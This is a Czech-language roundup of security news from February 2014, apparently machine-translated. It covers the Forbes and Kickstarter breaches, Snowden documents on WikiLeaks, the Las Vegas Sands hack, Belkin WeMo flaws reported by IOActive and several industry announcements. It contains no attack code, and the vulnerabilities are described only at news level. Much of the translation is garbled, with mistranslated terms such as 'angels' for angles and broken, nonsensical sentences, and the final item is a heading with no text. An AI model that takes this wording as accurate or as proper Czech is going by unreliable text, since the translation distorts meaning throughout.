. Masivní narušení bezpečnosti osobních údajů, které se stalo v posledních letech prokázaly nade vší pochybnost, že metoda ověřování znění heslo má mnoho nedostatků, výzkumní pracovníci a podniky, které pracují na alternativy k této chybné systému zabezpečení se však z mnoha různých režimů: obrázky a grafikou na bázi hesla, inkblot na základě hesla , pass-myšlenky , a tak dále. Všechny tyto přístupy hledají způsob pro uživatele vytvořených hesel, které budou jedinečné a snadno zapamatovatelné pro uživatele, ale je obtížné odhadnout, a / nebo přerušit pro útočníky. Poslední z těchto pokusů byl popsán počítačovým vědcem Zijad Al- Salloum ze ZSS-výzkum v Ras Al Khaimah, Spojené arabské emiráty. Věří, že "geografické" hesla jsou řešením problému (kliknutím na screenshotu pro zvětšení): . Tento přístup počítá s tím, že uživatelé mohou snadněji pamatovat oblíbené místo, které složité heslo, které si vybrali sami Pomocí tohoto systému, uživatel by si vybral místo na mapě - pozice stromu má rád k odpočinku pod, památník se mu líbí na návštěvu, místo, kde zažil svůj první polibek a tak dále -., a nakreslete hranici kolem něj "Volba zeměpisné oblasti, může být provedeno s použitím různých způsobů a tvarů, uživatel - například - můžete umístit kruh kolem svého oblíbeného hory, nebo polygon kolem svého oblíbeného souboru stromů, pro příklad, "vysvětluje Al-Salloum. "Bez ohledu na to, jak jsou vybrané geografické oblasti, geografické informace, které mohou být řízeny z těchto oblastí (jako je zeměpisná šířka a délka, nadmořská výška, plochy, obvodu, bocích, andělé, poloměr, nebo jiné) tvoří geografickou heslo. " Všechny tyto informace slouží k "vypočítat" heslo, které pak dostane "solené" s uživatelsky specifické náhodný řetězec znaků, a to vše dohromady dostane "hash" na konci. . Tímto způsobem různí uživatelé budou účinně nikdy mít stejné heslo Tento typ hesla má mnoho výhod: jsou snadno zapamatovatelné a těžké na to zapomenout, různorodé, a jen těžko předvídat. A podle Al-Salloum, "navrhuje efektivní výměnu běžných hesel by mohlo snížit 76% z narušení dat, na základě analýzy více než 47.000 nahlášených bezpečnostních incidentů.


SEA hacky Forbes, krade a nevrací záznamy o uživatelích 1M
26.2.2014 Hacking
Obchodní zpravodajský web Forbes a jeho registrovaní uživatelé jsou nejnovější obětí syrské elektronické armády (SEA) hacker kolektivní, který ukázal , že se vloupal do firemní sítě a vzlétl s databází obsahující více než 1 milion uživatelů a některé Forbes 'staffers záznamy . " Forbes.com byl zaměřen na digitální útoku a naše publikační platforma byla ohrožena, "která stojí za zveřejnění TEXT potvrdil krátce po zjevení, a varoval: "E-mailová adresa pro každého registrovaného Forbes.com byl vystaven prosím. mít na pozoru před e-maily, které purport pocházejí z Forbes, jako je seznam e-mailových adres, mohou být použity v oblasti phishingových útoků. " Také dodal, že hesla byly zašifrovány, ale že uživatelům udělá dobře, je v každém případě změnit jednou podepsat-na je znovu k dispozici. Poté, co zpočátku tvrdil, že by prodat databázi, SEA hackeři rozmysleli a dělal to k dispozici pro veřejnost ke stažení. Sophos 'Paul Ducklin a jeho kolegové se podařilo dostat své ruce na soubor, a zjistil, že záznamy obsažené uživatelská jména, šifrovaná data heslem, plná jména uživatelů, e-mailová adresa a další. Oni analyzovali data, a zjistil, že hesla nebyla šifrována, ale solené a hash. "Oni používají to, co se nazývá PHPass Přenosný formát," sdílené Ducklin, a vysvětlil, jak to funguje. "můžete" pracovat pozpátku "od Forbes datatbase k obnovení hesla, ale budete potřebovat hodně výpočetního výkonu, nebo čas, nebo obojí, "poznamenal a dodal schéma je dobré v případě, že uživatel zvolil složité a dlouhé heslo. , ale poté, co se jim podařilo prolomit hesla, které patří do Forbes staffers, bylo jasné, že i oni používají velmi špatné heslo. "Forbes udělal špatnou věc tím, že se porušila na prvním místě, a tím, že nechá SEA zmizet s jeho heslem databází, "komentoval Ducklin. "A zatímco 8193-iterace MD5 na bázi hašování popsaný systém je trochu krátký moderní osvědčených postupů (zkuste silnější hash, který trvá déle, než se počítat s více iterací), je to lepší než Adobe katastrofální "jeden klíč pro všechny šifrování "Systém.


Kickstarter trpí porušení dat
26.2.2014 Bezpečnost
Pokud jste někdy podpořila projekt Kickstarter, budete vědět, že populární crowdfunding platforma zažít porušení dat, a že některé z vašich informací byla ohrožena.

Společnost zároveň zveřejnila blogu a rozeslal e-mailové upozornění popisovat rozsah a možné důsledky kompromisu, stejně jako jejich činnosti v jeho brázdě. Oni byli informováni o porušení ve středu 12. února úředníky činnými v trestním řízení. " Na učit se toto, jsme okamžitě zavřel narušení bezpečnosti a začal posílení bezpečnostních opatření v celém systému Kickstarter, " zveřejněny CEO Kickstarter Yancey Strickler. "Žádné údaje kreditní karty jakéhokoliv druhu byla zobrazena hackery. Neexistuje žádný důkaz o neoprávněné činnosti jakéhokoliv druhu Na všechny ale dva uživatelské účty Kickstarter, "ujistil se na vědomí. , ale následující informace uživatele byla zobrazena:. uživatelská jména, e-mailové adresy, poštovní adresy, telefonní čísla, a šifrovaných hesel "Starší hesla byla jednoznačně solené a štěpen pomocí SHA-1 vícekrát. Novější hesla jsou zatříděna s bcrypt, "sdílené Strickler, a dovolil, že" je možné, že škodlivý osoby s dostatečným výpočetním výkonem hádat a bezva šifrované heslo, zejména slabý nebo zřejmý. " Uživatelé, kteří přihlášení do nastartoval s jejich Facebook přihlašovací pověření můžete být jisti, že jejich přihlašovací údaje nebyly ohroženy, ale bude muset znovu příště přístup na stránky jako Kickstarter se obnovit všechna Facebook přihlašovací údaje jako prevence. společnost doporučuje uživatelům vytvářet nové heslo, a aby jej změnit na jiné účty, pro které se používají starý. "Kickstarter udělal ty správné věci v návaznosti na porušení, upozornění uživatelů a radí jim obnovit hesla prostřednictvím svých internetových stránek. Je to moudré, jak to udělat, i když Kickstarter uloženy jeho hesla v zašifrované podobě, "uvedl Keith Bird, UK generální ředitel společnosti Check Point. "Ale uživatelé by měli být velmi opatrní kliknutí na odkazy v jakýchkoli navazujících e-mailů, které dostávají, které se zdají pocházejí z Kickstarter a příbuzných organizací, bez ohledu na to, jak pravděpodobný, že e-maily se zdají být. Existuje reálné nebezpečí, že údaje odcizeny v hacku mohou být použity v phishingových útoků, vyzkoušet a sklizeň i další osobní údaje. " Strickler nesdílel jakékoliv Podrobnosti o tom, jak se útočníkům podařilo na houpačce útok.


NSA a GCHQ cílené WikiLeaks a podporovatelé
26.2.2014 Špionáž
Nově analyzované dokumenty od NSA informátor Edwarda Snowdena je poklad bodu do USA NSA a ve Velké Británii GCHQ cílení WikiLeaks, své příznivce a další aktivisty, a snaží se určit WikiLeaks jako "škodlivý zahraniční herce", aby mohli používat elektronický dozor proti nim, aniž by . se obávat, zda jsou současně surveilling amerických občanů dokumenty zjevně ukazují, mimo jiné, že:

GCHQ shromažďují IP adresy návštěvníků na webových stránkách WikiLeaks
Americká armáda byla pikle zničit WikiLeaks
Obamova administrativa se snažila přesvědčit několik spojeneckých zahraniční vlády podat trestní oznámení proti Julian Assange k publikování více než 70.000 utajované dokumenty vztahující se na válku v Afghánistánu
Že proběhly diskuse o zaměření se na Pirate Bay a anonymní hacktivists.
Pro více informací, pro (konečně!) zveřejnila dokumenty, a pro reakce na zjevení, doporučuji navštívit nově vzniklý průnik


Hackeři dokázat masivní krádeže dat z amerického provozovatele kasina
26.2.2014 Kriminalita
Minulý týden hack a znetvoření na oficiálních stránkách US-založené Las Vegas Sands Corp. a že z populárních kasina působí zřejmě neovlivnilo zákazníky a hazardní systémy korporace.

Ale útočníci - hacker skupiny, který vystupuje pod názvem "Anti zbraní hromadného ničení týmu" -. Zveřejnili video, prokazující, že se dostat pryč s 828 GB souborů Eduard Kovacs zprávy (?) Javascript, aby soubory nebyly unikly on-line , ale video ukazuje jeden z hackerů projít složek a souborů, které exfiltrated (a dát na pevném disku), a mezi nimi jsou soubory s finanční informace společnosti, informace o svých zaměstnanců, hesla pro pracovní stanice, sítě, a mnoho více. Mezitím, společnost přinesla na postižená místa zpět do režimu online, s některými změnami. E-mailový systém společnosti byla také obnovena. Útok byl údajně připojen jako odplatu za Las Vegas Sands Corp CEO Sheldon Adelson projev, v němž vyzval americkou vládu shodit atomovou bombu na Írán namísto vyjednávání. Vyšetřování stále probíhá, a vymáhání práva byl zapojen, takže další odhalení o ohrožení dat jsou možné.


Ředitel FBI James Comey na keynote RSA konference 2014
26.2.2014 Bezpečnost
RSA Conference oznámil, že ředitel FBI, se James B. Comey poskytnout keynote prezentaci na středy 26 února na konferenci RSA 2014 v San Franciscu. Během svého zasedání "FBI a soukromý sektor: překonání rozdílů v kybernetické bezpečnosti," Comey bude diskutovat své názory na horní kybernetických hrozeb pro národní bezpečnost USA. Účastníci se naučí, že zatímco americká vláda a podniky učinily velké pokroky v počítačové bezpečnosti, tam je ještě mnoho práce je třeba udělat. Comey vysvětlí potřebu vlády a soukromého sektoru k lepší informovanosti podíl hrozeb v reálném čase, aby se překlenout propast, a nejlépe řešit dnešní kybernetickým hrozbám. V září 2013 Comey složil přísahu jako sedmý ředitel FBI. New York rodák, Comey vystudoval College of William and Mary a University of Chicago Law School. Působil jako asistent amerického zástupce v obou jižní obvod New Yorku a východní obvod Virginie. Comey později se vrátil do New Yorku, aby sloužil jako USA zmocněnec pro jižní obvod New Yorku. V roce 2003, on byl jmenován sloužit jako náměstek generálního prokurátora z ministerstva spravedlnosti. "S přetrvávající hrozbou útoků na kritické vlády a veřejné infrastruktury je nyní čas pro komunitu mít hlubší diskusi o kritických strategií pro ochranu a obranu , "řekl Alex Bender, GM RSA Conference. "S řediteli FBI Comey dárek na letošní konferenci RSA je ideální příležitost pro rekordní počet bezpečnostních odborníků, aby se zapojily nejvyšší americký vládní úředník sdílet a dozvědět se o nejnovějších trendech v bezpečnostním inteligence."


Půl milionu uživatelů Belkin WeMo jsou široce otevřené pro útočníky
26.2.2014 Kriminalita
IOActive odhalil několik zranitelností ve Belkin WeMo domácí automatizace zařízení, které by mohly mít vliv na více než půl milionu uživatelů. Belkin WeMo používá Wi-Fi a mobilní internet k ovládání domácí elektroniky kdekoliv na světě, přímo z telefonu uživatelů.

Mike Davis, IOActive je hlavní vědecký pracovník, odkryl několik zranitelností v sadě produktů WeMo který dává útočníkům schopnost:
Dálkové ovládání WeMo Home Automation připojená zařízení přes internet
Proveďte škodlivé aktualizace firmwaru
Vzdáleně monitorovat zařízení (v některých případech)
Přístup k interní domovské sítě.
Řekl Davis, "Když spojíme naše domovy na internetu, je stále důležitější pro Internet-na-věci vendors zařízení, které zajistí, že přiměřené methodologies zabezpečení jsou přijaty na počátku vývojových cyklů výrobku. To snižuje expozici svých zákazníků a snižuje riziko. Dalším problémem je, že zařízení WeMo využít pohybové senzory, které mohou být použity útočník vzdáleně monitorovat obsazení v domácnosti. " Dopad Chyby nalezené v rámci zařízení Belkin WeMo vystavit uživatelům několik potenciálně nákladných hrozeb, od domácích požárů se možné tragické následky až do odpadu jednoduché elektrické energie. Důvod pro toto je, že poté, co útočníci ohrozit zařízení WeMo, mohou být použity k dálkovému zapnutí připojených zařízení zapínat a vypínat kdykoliv. Vzhledem k počtu WeMo zařízení v provozu, je vysoce pravděpodobné, že mnoho z připojených přístrojů a zařízení budou bez dozoru, což zvyšuje hrozbu těmito chybami zabezpečení. Navíc poté, co útočník naváže připojení k WeMo zařízení během několika obětí sítě;. Zařízení lze použít jako opěrný bod k útoku na jiné zařízení, jako jsou notebooky, mobilní telefony, a připojené úložiště souborů v síti zranitelnosti Obrazy Belkin WeMo firmware, které se používají k aktualizaci zařízení, jsou podepsány pomocí šifrování veřejným klíčem k ochraně proti neoprávněné úpravy. Nicméně, podpis klíče a hesla jsou unikly na firmware, který je již nainstalován na zařízení. To umožňuje útočníkům používat stejný podpisový klíč a heslo pro přihlášení své škodlivé firmwaru a bezpečnostní obtok kontroly během procesu aktualizace firmwaru. Navíc Belkin WeMo zařízení nemají ověřit Secure Socket Layer certifikátů (SSL) jim brání ověřování komunikace s Belkin oblak servis včetně aktualizace firmwaru RSS. To umožňuje vydávat cloudových služeb Belkin a tlačit škodlivé aktualizace firmwaru a pověření zachytit současně útočníci použít jakýkoli certifikát SSL. Vzhledem k integraci cloud, aktualizace firmware se tlačil do domu oběti bez ohledu na to, které spárované zařízení přijme oznámení o aktualizaci nebo jeho fyzické umístění. Internetové komunikační infrastruktura používá pro komunikaci Belkin WeMo zařízení je založen na týrané protokolu, který byl navržen pro použití o Voice over Internet Protocol (VoIP) služby, jak obejít firewall nebo NAT omezení. Dělá to tak, že ohrožuje všechny WeMo zařízení zabezpečení vytvořením virtuálního WeMo darknet, kde lze všechny WeMo zařízení připojené přímo,., A, s některými omezené hádání o "tajné číslo", kontrolované i bez aktualizace firmwaru útoku Belkin WeMo server aplikace programovací rozhraní (API) Bylo rovněž zjištěno, že mohou být zneužity k začlenění zranitelnosti XML, který by umožnil útočníkům ohrozit všechny WeMo zařízení. IOActive úzce spolupracoval s CERT na zabezpečení, které byly objeveny. CERT několik pokusů kontaktovat Belkin o otázkách, nicméně, Belkin byl necitlivý. aktualizace: středa 19 února 2014 Belkin nás kontaktovat pomocí následujícího příkazu: Belkin byl opraven seznam pěti možných slabých míst, které se týkají WeMo řadu domácí automatizace řešení , který byl publikován v CERT poradenství na 18. února. Belkin byl v kontaktu s výzkumnými pracovníky bezpečnostních před zveřejněním poradenství, a od 18. února už vydal opravy pro každý ze zjištěných potenciálních slabých míst prostřednictvím in-app oznámení a aktualizace. Uživatelé s nejnovější verzi firmwaru (verze 3949), nejsou ohroženi na zákeřné útoky s firmwarem, nebo dálkové ovládání nebo sledování WeMo zařízení od neautorizovaných zařízení. Belkin naléhá na takové uživatele ke stažení nejnovější aplikace z App Store (verze 1.4.1) nebo Google Play Store (verze 1.2.1) a potom inovovat na verzi firmwaru prostřednictvím aplikace. Specifické opravy Belkin vydala patří: 1. Aktualizace API serveru WeMo dne 5. listopadu roku 2013, zabraňuje XML vstřikování útoku získat přístup k jiným zařízením WeMo. 2. Aktualizace na WeMo firmware, zveřejněné 24. ledna 2014, který přidává šifrování SSL a ověřování na distribuční firmware krmiva WeMo, eliminuje ukládání podpisu klíče na zařízení, a heslo chrání rozhraní sériového portu, aby se zabránilo škodlivému útok firmware 3. Aktualizace aplikace WeMo pro obě iOS (zveřejněné 24. ledna 2014) a Android (zveřejněné 10. února 2014), který obsahuje nejnovější aktualizace firmwaru


Největší obavy chybějící hrozeb mezi zranitelností bezpečnostních profesionálů
26.2.2014 Zranitelnosti
Kontinuální monitoring, jehož kořeny leží s americkou vládou, řeší mnohé z problémů, jimž čelí tradiční řešení pro správu zranitelností a nabízí CISO a vedoucí bezpečnosti napříč odvětvími blízko real-time pohled na bezpečnostní pozici svých institucí. Nový průzkum zjistil, že Organizace, které zavedly průběžné sledování jsou více než dvakrát vyšší pravděpodobnost, že je spokojen s jejich přístupem pro správu zranitelností ve srovnání s těmi, kteří používají periodické skenování. Navíc Forrester zeptal se 45 procent respondentů, kteří se přijala CM vysvětlit výhody. Říkali, že kontinuální monitorování:

Výhody všechny fáze řízení zranitelnosti
Výhody všechny vertikály
Lepší vybavuje organizace vypořádat s mobilní pracovní síly
Výhody ty s rizikem VM programu nejvíce zaměřuje
Splňuje CISO více než jakýkoli jiný roli.
Konzumerizace, mobilita a cloud jsou charakteristickými znaky rozšířeného podniku, a pravidelné snímek skenování zranitelnosti nelze účinně řešit dynamickou povahu dnešních rozšířených podnikových prostředích. I když to katapultovalo řízení zranitelnosti jako jeden z nejlepších obav pro organizace - 86 procent respondentů hodnotí to jako jejich druhý nejvyšší bezpečnosti IT priority pro příštích 12 měsících - zůstávají zabývající se účinně snižuje riziko jejich organizace kompromisu. . Konkrétně, organizace se snaží zavést účinné postupy řízení zranitelnosti, takže je vystaven útokům Studie zjistila, že:

Téměř 74 procent dotázaných respondentů potýkají s problémy s jejich celkovým programem VM
79 procent tvrdili, že byli s větší pravděpodobností chybět kritické zranitelnosti vzhledem k nedostatečným údajům zúžit vhodné koncové body pro skenování
70 procent skenování měsíčně nebo méně.
"Průzkum ukazuje, že i když organizace používají pravidelné prověřování zranitelnosti, je to prostě nestačí," vysvětlil Ron Gula, CEO a CTO Tenable Network Security. "V dnešním prostředí mobilní, oblačnosti a BYOD, rozšířený podnik představuje zvláštní problémy, a organizace zjišťují, že je obtížné, aby se tradiční správu slabých míst práce pro ně. Potřeba bezpečnosti, která pokrývá 100 procent aktiv po celou dobu nikdy nebylo více zřejmé, než s nedávnou sérii úspěšných porušení. " Udržení konzistentní a efektivní správu slabých míst pracovního postupu se ukázal jako hlavní problém 77 procent respondentů má obavy o přesné objev aktiv. Exploze přechodných koncových sloučenin obtíže objevují majetek v organizaci a výrazně zvyšuje pravděpodobnost účinného porušení, pokud jsou neznámé aktiva nejsou identifikovány a řádně posouzeny. Navíc, 66 procent uvedlo, že nebyli jisti v provádění správné zranitelnosti nápravu. Poté, co snímá data vrácena, neměli pocit, že měli jasnou představu o rizicích tak, aby se přesně stanovení priorit jednat. "Pravidelné skenování zranitelnosti selhaly v novodobé CISO," řekl Gula. "Porušení se stále vyskytují alarmující rychlostí, a hrozeb se neustále vyvíjí. Cílem pro jakékoliv CISO je zůstat na špici ohrožení, a jediný způsob, jak to udělat, je přes přijetí kontinuální monitorovací platformu. To umožňuje uživatelům rychle nasadit záplaty vypnout těmto hrozbám v hodinách, nikoli měsíců, aby nebezpečné okna příležitost se zavřel před business-critical data jsou ohrožena.


Jeden z prvních vynálezců síť brány firewall, aby se do Abu Dhabi
26.2.2014 Bezpečnost
Jeden z tvůrců prvního světového síťový firewall a autora "Firewall a Internet Security: odpuzující lstivý Hacker", Bill Cheswick, bude dodávat prezentaci na jednom z nejočekávanějších konference v roce 2014, 3. vydání z Cyber ​​Security pro energetickou & Utilities 2014 konferenci, kterou pořádá IQPC The Westin, Abu Dhabi 23 - 26 března 2014.

. Událost je shromažďování počítačové bezpečnostní odborníky z celého světa, aby SAE s konkrétním cílem zabránit v reálném čase hrozby a správu bezpečnostních výzev pro SCADA / ICS systémů IT bude Bill se mluví o "Přehodnocení hesel a pinů: Fix naše oslabení bezpečnost ". On komentuje, "Authentication je docela jasně rozděleny. I když máme příklady dlouhodobých úspěchů, existují zprávy o masivních dat heslem rozlije po celou dobu. Jak se můžeme dostat z této situace? Navrhuji některá řešení či pokyny, které mohou být zajímavé pro účastníky. " On se zeptal, jak ICT průmysl se potýká s výzvami, se dále dodává: "Špatně. I když věci obecně pracují (viz, například, úspěch v online bankovnictví), většina institucí jsou citlivé na špionáž a vnější rušení, a to navzdory osvědčených postupů. Něco velký dost být nazýván "intranet" je zřejmě mimo kontrolu. Vždycky jsem si najít konference jako to bude skvělé místo, učit se nové věci a držet krok s nejnovějšími problémy a jejich řešení. Je to jedna z velkých výhod je pozván, a děkuji vám. Očekávám, že účastníci budou mít stejnou zkušenost. " událost také slibuje hostit řadu VIP hodnostářů z hlavních vládních a soukromých organizací, včetně ropných a plynárenských společností. Dr. Jamal Al Hosani, oficiální mluvčí a ředitel informačních a komunikačních technologií, National Emergency krize a katastrofy řídící orgán, budou Spojené arabské emiráty se uvádět události a také dává hlavní projev na vývoj ochrany kritické infrastruktury. Podplukovník Faisal Al Shammari, Chief Information Security Officer z Abu Dhabi Policie bude dodávat druhý hlavní projev a řešit důležité téma kybernetické obrany iniciativ strategie a realizace. Don Codling, bývalý vedoucí odboru kybernetické bezpečnosti Federal úřad pro vyšetřování (FBI) bude předsedat událost, vedení celodenní workshop na téma kontroly ICS systémů a kybernetické inteligence, stejně jako mluvit na velmi zajímavé téma - "Reálné příklady narušení bezpečnosti ICS z FBI. "Moje Témata konference bude zaměřen nejen na reálných příkladech světových kybernetických průniky trestních ICS systémů, ale také připomenout účastníka některé z "lidské motivace" faktorů podílejících se na těchto typech událostí a posílit základy reagovat jak na fyzické narušení a počítačových porušení . I když je důležité, aby účastníci nezapomeňte snažit se držet stanovených kritických kontrol, je stejně důležité mít přesné a neustále se vyvíjející obraz krajiny hrozeb (z kybernetické hrozby inteligence), tak, aby mohli co nejefektivněji a efektivně nasadit své omezené zdroje. Je to také jde se ven tím, že základy musí být důsledně dobře snížit možnost útočník nalézt slabé místo ve vaší obraně. " Základní penetrační plochy musí být označeny ve vysoce kritické infrastruktury, protože ty jsou nejvíce citlivé na vnější hrozby. SCADA, DCS a ICS systémy jsou považovány za velmi kritický ve většině z ropy, zemního plynu, energetických a hliníkových společností. V reálném čase hrozby hlásí nárůst četnosti jejich výskytu a společnosti byly na přijímajícím konci těchto hrozeb. ADCO vedoucí oddělení IT bezpečnosti, Reimer Brouwer, GASCO vedoucí oddělení IT služby, Mohamed Al Sawafi, Koc je Sr Real-time Engineer Andrey Zolotavin, KGOC v Sr IT Engineer, Abdulla Al-Akhwand a několik dalších se také mluví v tomto případě na velmi zajímavá témata. "My se zabývá základní otázkou řízení SCADA zadní vrátka zranitelnosti. Kalení SCADA protokoly a služby, a zajištění ochrany v reálném čase hrozby zůstává hlavní výzvou ropy, zemního plynu a energetických společností. Moje prezentace pomůže účastníkům získat vhled a dospět k pozitivní obchodní výsledky k řešení těchto problémů, "říká George Jason, viceprezident Comguard. Správa rizik v cloud computingu bude ve velké míře pokryty ISACA Spojených arabských emirátech je prezident, Gurpreet Kochar zatímco velké bezpečnostní údaje se vztahuje Ali Rebaie, jeden z předních světových 51 Big dat vlivy. Hnojiv IT Security Officer, bude Mohammed Ikrami se dotýká velmi zajímavé a univerzální téma zahrnuje bezpečnostní informace pro chytřejší budoucnosti. Tématem bude upozornit na pokročilé počítačové analýzy, která je jádrem každého post-mortem hlášených incidentů. "Počítačová bezpečnost je velmi důležitým aspektem energetického podnikání dnes. Kolik vůbec děláte, nebude postačovat v tomto neustále se vyvíjející hrozby. Těším se, aby se zúčastnili 3. ročník Cyber ​​Security v Abu Dhabi a vidět některé zajímavé rozhovory od fantastických odborníků z celého světa. Nikdy jsem neviděl tuto všestrannost reproduktory, stejně jako návštěvníků, a to je příležitost, že bych se chtěl nechat ujít. To je vzrušující platformu, kde bych si přál, aby firmy a odborníci pracují na implementaci nejlepších postupů a překonávání problémů ve Spojených arabských emirátech, "říká Jeho Excelence Khaled Al Mansouri, prezident IAEM a ICBR, který je jedním z VIP účastníků na této prestižní akce. Don Codling komentáře, "příležitost setkat se s kolegy a vrstevníky v celé řadě společností a národů umožňuje volnou výměnu nápadů, zkušeností a osvědčených postupů. Možná stejně důležité, navazování osobních vztahů s kolegy v průběhu událostí, jako jsou této události IQPC je rozhodující v době krize, bylo prokázáno, znovu a znovu, aby výrazně snížit dobu odezvy a administrativní tření při kybernetických narušení událostí.


GFI Cloud dostane lepší sledování výkonu
26.2.2014 Bezpečnost
GFI Software má lepší možnosti monitorování výkonu sítě a další funkce GFI Cloud , společnosti IT platformu pro malé a střední podniky, které umožňuje IT administrátorům snadno spravovat a zabezpečit servery, pracovní stanice, notebooky a mobilní zařízení z jediného, ​​intuitivního, webové uživatelské rozhraní .

Dnešní SMB správce IT nese mnoho povinností s cílem podpořit jejich sítě a koncové uživatele. Snad nejdůležitější je zachování provozuschopnosti sítě a poskytování služeb. S ohledem na tuto skutečnost, GFI Cloud nyní dává správcům hlubší přehled o výkonu serverů a pracovních stanic o sledování využití CPU, paměť a výkon disku. To jim umožňuje určit a řešit problémy s výkonem sítě před tím, než může mít dopad na produktivitu. Mezi další nové funkce patří více výkonné nástroje pro podávání zpráv, které umožňují organizacím, aby bedlivě soupis všech softwarových aktiv a sledování účinnosti politik webové použití. Administrátoři budou přijímat zprávy výstrah je, když se politika web-použití byla porušena koncové uživatele. Powered by GFI LANguard 2014 , automatizované funkce pro správu náplast GFI Cloud je nyní podporují více než 20 dalších oprav třetích stran, včetně produktů od Adobe. Kromě všechny záplaty společnosti Microsoft a nyní více než 50 aplikací třetích stran, GFI Cloud podporuje 12 nejzranitelnější aplikace v roce 2013. služby GFI Cloud poskytují malým a středním podnikům s pokročilými Ochrana před viry a anti-malware, patch management, ochrana Web, monitorování sítě a služby pojištění, a majetku a řízení zásob. Tyto služby poskytují správcům schopnost monitorovat zdraví a stabilitu svých sítí a optimalizaci serverů a pracovních stanic konfigurace pro zvýšení výkonu. některé nebo všechny z těchto služeb mohou být nasazeny ve flexibilní a škálovatelné způsobem, který nejlépe vyhovuje jedinečné obchodní potřeby malých a středních firem. Je také snadno integruje s vzdáleného přístupu systému TeamViewer. Pokud je TeamViewer detekován na počítači, GFI Cloud automaticky umožňuje jedním klepnutím přístup k tomuto počítači, který umožňuje správci IT brzy vyřešit problémy a jejich řešení rychle. služby GFI Cloud, jako například webovou ochranu, Antivirus a Patch Management, jsou Kus Oceněno pouhých 12 liber na počítači, za rok. Multi-rok a servisní svazku slevy platí. Všechny odběry jsou dodávány s celosvětově uznávané zákaznický servis podporu GFI, k dispozici 24/7 a údržbu softwaru.


Co můžete očekávat na konferenci RSA 2014
26.2.2014 Bezpečnost
Roční RSA Conference se koná příští týden v San Franciscu, a Avivah Litan, viceprezident a odlišit analytik společnosti Gartner, pokud své myšlenky na to, co můžete očekávat na letošním ročníku a na některé z nejlepších bezpečnostních trendů v roce 2014.

Co očekáváte od RSA v letošním roce?

jsem očekával hodně brnknout o nedávných maloobchodních porušení, programy pro dozor nad NSA a DDoS útoky. Mnoho řečníků a prodejců na výstavě budou pravděpodobně využívat nepřeberné množství bezpečnostních přestupků v loňském roce vytvořit pocit naléhavosti pro více inteligentních řešení. Očekávám, že "inteligentní analýzy" a "kontext vědom zabezpečení", které mají být základní témata. Jedním z přednáškách na RSA se zaměří na redefinici identity ve věku inteligence řízené bezpečnosti. Zatímco identita se nachází v centru kybernetické bezpečnosti, rychlý růst Nexus ozbrojených sil - mrak, informace, mobilní a sociální - určuje, co lze přistupovat a jak. Jak vidíte Nexus sil ovlivňujících inteligence řízené bezpečnosti? Nexus Sil (konvergence čtyř vzájemně propojených trendů: sociální interakce, mobilita, cloud, a informace) vytvoří mnohem bohatší sadu kontextových informací o identitách. To umožňuje skutečné analýzy časových a obchodní rozhodování asi hodně různých složek informace o identitě, takže jednotlivci mohou být efektivněji servis, a podniky se může stát výhodnější. Ale to vše také přichází s bezpečnostními a soukromí rizik. Myslím, že všichni čelí obrovským výzvám, o tom, jak využít přílivových vln informací o totožnosti a kontextových dat při respektování soukromí a udržování bezpečného prostředí. soukromí Zákazník je vždy obrovský obavy, dokonce více tak po nedávných narušení dat na velkých prodejců , a během posledních několika týdnů, řada prodejců oznámila výrazné změny zabezpečení na některé ze svých výrobků. Jaké jsou hlavní oblasti, na které se zaměřují na zajištění soukromí zákazníka? soukromí zákazníků v části znamená, že zákazníci budou mít konečné slovo při rozhodování o tom, jak je jejich sdílení informací. To obecně znamená, že spotřebitelé právo rozhodnout v tom, jak se informace o nich shromažďují, jaké informace jsou shromažďovány a jak je jejich sdílení informací. To je, když na ochranu osobních dat se stává smysl. Problém s maloobchodu a plateb je, že zabezpečení dat a soukromí jsou mimo kontrolu spotřebitelů. Nemají žádný vliv na to, jak je jejich údaje platební karta chráněna. Jediné, co mohou udělat spotřebitelé se nesmí používat kreditní nebo debetní karty, například v případě, že se obávají krádeže těchto informací. Kam myslíš, že podniky a maloobchodníci by měli zaměřit své bezpečnostní úsilí v průběhu několika příštích let? bych samostatné bezpečnostní úsilí se do dvou širokých oblastí - první je funkční a druhý je strategické. Pro jistotu, podniky potřebují uzamknout své pevnosti, stejně jako je to možné na operační straně - například prosazování silné, ale riziko vychází kontextové ověřování, ujistěte se, hesla nejsou sdíleny zařízení, whitelisting software, který lze spustit na koncových bodech, whitelisting . bodů, které mohou být citlivé informace převedeny do více Současně, oni potřebují také dát úsilí do strategických technologií - a to pro analýzu bezpečnostních a zpravodajských služeb, které využívá rychlý přístup k důležitým informacím. To jim dá možnost určit přestupky uprostřed neustálého hluku a přívalem každodenních událostí. Například by to umožnit, aby podnik detekovat anomální přístup k serveru nebo anomální chování na koncový bod a korelovat tyto anomálie s jinou interní a externí informace s cílem získat obraz o bezpečnostní přestupek proti podniku.


Odstranění administrátorská práva zmírňuje 92% kritických zranitelností Microsoft
26.2.2014 Zranitelnosti
Avecto analyzovali data z bezpečnostních bulletinů vydaných společností Microsoft v průběhu roku 2013 a dospěl k závěru, že 92% všech chyb než Microsoft s kritickým stupněm závažnosti lze zmírnit tím, že odstraní administrátorská práva.

Výsledky také ukázaly, že odstranění administrátorská práva by zmírnily 96% kritické zranitelnosti, které ovlivňují operační systémy Windows, 91% kritické zranitelnosti, které ovlivňují Microsoft Office a 100% zranitelností v aplikaci Internet Explorer. Pokud malware infikuje uživatele s právy administrátora, může to způsobit neuvěřitelnou škodu místně, ale i v širším síti. . Navíc, zaměstnanci s právy administrátora mají přístup k instalaci, upravovat a mazat software a soubory, stejně jako měnit nastavení systému Paul Kenyon, spoluzakladatel a viceprezident pro Avecto řekl: "Nebezpečí právy administrátora byly dobře zdokumentovány na nějakou dobu, .. ale co víc o je počet podniků se mluvit, že stále ještě nejsou plně vědomi, kolik uživatelů admin mají Bez jasnou viditelnost a ovládání, které se potýkají s neznámou a vyčíslen bezpečnostní hrozbu " dospěl k závěru, Paul: "Tato analýza se zaměřuje čistě na známé zranitelnosti, a počítačoví zločinci budou rychle využít chyb, které jsou neznámé dodavatelům. Obrana proti těmto neznámým hrozbám je obtížné, ale odstranění administrátorská práva je nejúčinnější způsob, jak to udělat. "


Apple vydal OS X 10.9.2 záplatování SSL zranitelnost a aktualizuje Safari

26.2.2014 Zranitelnosti
Apple vydal aktualizaci pro OS X, který záplaty SSL zranitelnost diskutovali Rick v neděli . Pro více informací navštivte stránku společnosti Apple o tom . Kromě toho Apple také vydal aktualizaci zabezpečení pro Safari a QuickTime .


Mobilní malware Evolution: 2013
26.2.2014 Analáza | Mobil
